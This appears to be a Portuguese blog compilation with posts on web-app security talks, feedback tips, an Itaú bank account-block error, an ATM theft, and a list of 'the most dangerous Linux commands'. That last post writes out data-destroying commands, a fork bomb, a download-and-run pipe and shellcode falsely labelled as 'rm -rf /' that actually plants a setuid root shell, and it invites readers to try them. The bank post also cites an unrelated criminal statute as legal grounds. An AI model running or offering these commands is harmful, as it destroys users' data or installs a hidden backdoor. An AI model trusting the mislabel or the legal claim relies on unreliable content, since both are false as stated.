Auditoria em Aplicações Web – Atacando e Defendendo


Palestra do Grupo Clavis Segurança da Informação,Segurança da Informação.
Atacando (e protegendo) aplicações web. O palestrante fala sobre técnicas de ataques e vulnerabilidades comuns em sistemas web. O conteúdo tem uma certa interseção com a área de testes de software, quando aborda determinados cenários de testes, como por exemplo a entrada de dados inesperados em um campo.

11 Técnicas de Feedback


Dar feedback não é simples quanto parece. Se você pretende enviar uma mensagem correta e assertiva,vai precisar entender a pessoa que a recebe, a forma que interpretará esta mensagem e, ainda, adaptá-la a situações específicas.

Ao contrário do que muitos imaginam, dar um bom retorno é uma questão que pode ser desenvolvida com o tempo e não necessariamente um fator de habilidade interpessoal.

De uma maneira ou de outra, o certo é que o feedback é essencial para que equipes produzam e se mantenham motivadas e isso não é diferente dentro de departamentos de TI

A seguir, algumas formas de dar feedback, não necessariamente com nomenclaturas técnicas; algumas adequadas para determinadas situações, outras nem tanto.

1) Não dar feedback

É a pior opção. O feedback é questão de sobrevivência para qualquer equipe, é o que conduz a autoestima do grupo, reduz o risco de perder funcionários, mantém a lealdade, a comunicação em dia; é, enfim,um dos principais nutrientes da motivação das pessoas.Não as deixe morrer desnutridas!

2) Dar feedback apenas quando as coisas vão mal

Ocorre principalmente com gestores que têm equipes grandes e acham que não há tempo hábil para dar feedback contínuo a todos. Resultado: ele procura o membro da equipe apenas em duas situações. 1) Para delegar tarefa ou 2) quando há algo de errado. Nas demais situações, o líder mal é visto pela equipe. 

É importante não ser omisso em momentos em que o trabalho vai bem: sua equipe precisa de um feedback positivo ou não tratará com a mesma compreensão e lealdade os instantes em que receber feedbacks negativos. 

Aprenda a como e quando dar um retorno bom e ruim, pois ambos são importantes. Os próximos tópicos podem oferecer dicas de como fazer isso. 

3) Técnica sanduíche

Continuar a ler

Erro 408X – Banco Itaú


Erro 408x Itau?

Esse é um transtorno onde vários clientes do itau passam, normalmente quando existe movimentação além do normal, quando isso acontece a sua conta é bloqueada.

Na próxima que você acessar o bankline pela internet ou no caixa eletrônico você vai receber a mensagem TRANSAÇÃO NÃO CONFIRMADA. FALE COM O SEU GERENTE. MENCIONE O CÓDIGO 408X“. essa mensagem é sem aviso prévio. Única maneira de desbloqueio é indo ate sua agencia e procurar a atendimento com a identidade original. O que demora é a fila de atendimento e alguns funcionários que não conhecem esse erro e de joga de um lado para outro.

Esse erro do Itau aconteceu com meu Pai e Esposa. Meu Pai estava viajando em outro Estado e normalmente estava usando o cartão pimpa bloquearam o cartão. Minha esposa fazendo reforma na casa , na hora de efetuar pagamento pimpa. Erro 408x.

Se você acessarem o reclamaaqui.com.br vão ver vários casos. é so pesquisar pelo 408x

 No caso da minha família entramos com um processo jurídico e ganhamos sem problemas. Fórum de pequenas causas já basta. O pagamento para pequenas causas é de até 5000,00. Se quiser mais ai tem que entrar com Advogado.

Esse dica vem do próprio Gerente do Itau que é vizinho nosso.

As provas podem ser coletadas no próprio fórum, eles acessaram a conta e viram o erro , depois disso eles imprimem e validam a copia. Essa ação chama-se Ata Notarial. Após disso eles anexam no processo.

Podem basear na Lei 7492: Art. 16

Fazer operar, sem a devida autorização, ou com autorização obtida mediante declaração (Vetado) falsa, instituição financeira, inclusive de distribuição de valores mobiliários ou de câmbio: Pena – Reclusão, de 1 (um) a 4 (quatro) anos, e multa.

 Mas ainda constrangimento publico e perdas e danos.

 Bem de você passou ou esta passando por essa situação podem entrar com uma ação em pequenas causas que 80% acostumam se causa ganha, dependendo das provas ….

Ladrão invade caixa eletrônico com pendrive e rouba R$ 87 mil


Creio que muitos já leram essa noticias , resumindo o ladrão ou pau-mandado estava recebendo instruções de um celular e depois de preso recebeu o título de hacker , Quem é o Hacker nessa estória ?

Em cena digna de filmes, um homem, identificado como Samuel, decidiu entrar em uma agência do Banco do Brasil na zona leste de São Paulo durante a noite de segunda-feira, 3, e hackear os caixas eletrônicos para roubar R$ 87 mil.

O hacker arrancou a câmera do aparelho e reiniciou o sistema do caixa após inserir um pendrive na porta USB e passou a rodar um software. Em seguida, utilizando um teclado dobrável de um notebook, digitava o valor que desejava ‘sacar’ e a máquina soltava o dinheiro. Ele começou pelas notas de R$ 100 e logo partiu para as de menor valor.

Entretanto, o homem logo foi detectado. A central de segurança do banco percebeu a atividade incomum e acionou a polícia. A PM apareceu na agência e o prendeu em flagrante.

O hacker recebia instruções de um cúmplice pelo celular, mas não identificou quem era o seu parceiro no crime.

fonte olhar digital :
http://migre.me/cdGAn

Leia Também : Chupa Cabra

Os comandos mais perigosos do mundo


Comando abaixo são usado no console ou em um terminal Linux , Se vc quiser testar vai em frente , mas não me pertube, sua conta em risco.  

Qualquer um desses comandos irá apagar tudo que estiver no seu diretório raiz:
01) sudo rm -rf /
02) rm -rf .*
03) dd if=/dev/zero of=/dev/sda
04) mkfs.ext3 /dev/hda
05) whatever > /dev/hda
06) cd ~; for x in `ls`; do mv -f $x $y; y=$x; done
07) find -type f -mtime +30 -exec mv {} /dev/null \;
08) mv ~ /dev/null
09) mv / /dev/null

10) O comando abaixo pode provocar o kernel panic (similar à tela azul da morte) ou congelará o sistema:
==> dd if=/dev/random of=/dev/port

11) Um comando que mais parece aquelas carinhas de chat, mas que também é conhecido como Bomba Fork:
==> :(){:|:&};:

12) Este faz o mesmo que “rm-rf /” (a diferença é que está em código decimal):
char esp[] __attribute__ ((section(“.text”))) /* e.s.p

release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

13) Este comando irá mover o diretório home para um lugar que realmente não existe (/dev/null é o buraco negro do Linux):
==> mv /home/username/* /dev/null

14) Este fará download de um script shell e executá-lo quando o download terminar ( a “|” = juntar, executar na sequência):
==> wget sumber_tak_terpercaya -O- | sh

15) Este irá impedi-lo de executar comandos com privilégios de root (outra variação do comando rm -f /):
==> rm -f /usr/bin/sudo;rm -f /bin/su

fonte: http://www.tecmundo.com.br/disco-rigido/4005-aprenda-a-formatar-e-deixar-o-hd-redondinho-.htm